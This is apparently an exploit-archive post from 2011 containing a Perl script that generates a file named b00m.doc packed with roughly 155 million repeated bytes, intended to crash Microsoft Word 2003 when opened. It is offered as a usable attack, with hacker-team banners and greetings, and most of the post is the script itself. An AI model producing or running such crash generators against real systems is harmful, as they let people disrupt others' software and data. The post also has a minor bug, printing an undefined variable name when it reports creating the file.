[D] MS-Office-Word 2003 Local (.doc) Local Crash Buffer[Z]

2011-02-07 10:46:02
Posted by: kedans

#!/usr/bin/perl

# [D] MS-Office-Word 2003 Local (.doc) Local Crash Buffer[Z]
#
#////------------------------------------------------------------------------------------------------------------------------------------
# Discovered By: kedAns-dz
# e-mail : [email protected]
# team : [D] HaCkerS-StreeT-Team [Z] Algerians HaCkerS
# GreetS : Islampard * Dr.Ride * Xorer * BadR0 * Nor0-FouinY
# Date : 04/02/2011
# --->
# Tested on : Windows Xp Sp3 - 32 bit - FR & AR / MSOffice Word 2003
# --->
#########################################################
## Usage-->>file created-->>load file-->>b00m.doc >>>BOOM!
#########################################################

#START SYSTEM /root@MSdos/ :
system("title KedAns-Dz");
system("color 1e");
system("cls");
print "|===========================================================|\n";
print "|= [!] MS-Office-Word 2003 Local (.doc) Local Crash Buffer =|\n";
print "|= [!] Author : KedAns-Dz =|\n";
print "|= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
print "|===========================================================|\n";
print "\n";
sleep(1);
print " Please Wait Till c0de Generate...\n";
my $boom = "\x41" x 100000000 .
"\x51" x 55900000;
my $filename = "b00m.doc";
open (FILE,">$filename");
print FILE "$boom";
print "\n\n[*] Creating $file file...\n";
sleep(1);
print "\n[+] File successfully created!\n";

#==============================================================================
#================[ Exploated By KedAns-Dz * HST-Dz * ]=========================
#[»] Team : [D] HaCkerS-StreeT-Team [Z] > Algerians Hackers <
# Greetz : all my friend * Islampard * Zaki.Eng * Noro FouinY * BadR0 * Dr.Ride
# Massinhou-Dz * Red1One * Fox-Dz * Hani * XoreR * Mr.Dak007 * TOnyXED ..all Dz
#-------------------------------------------------------------------------------

Fixes

No fixes

In order to submit a new fix you need to be registered.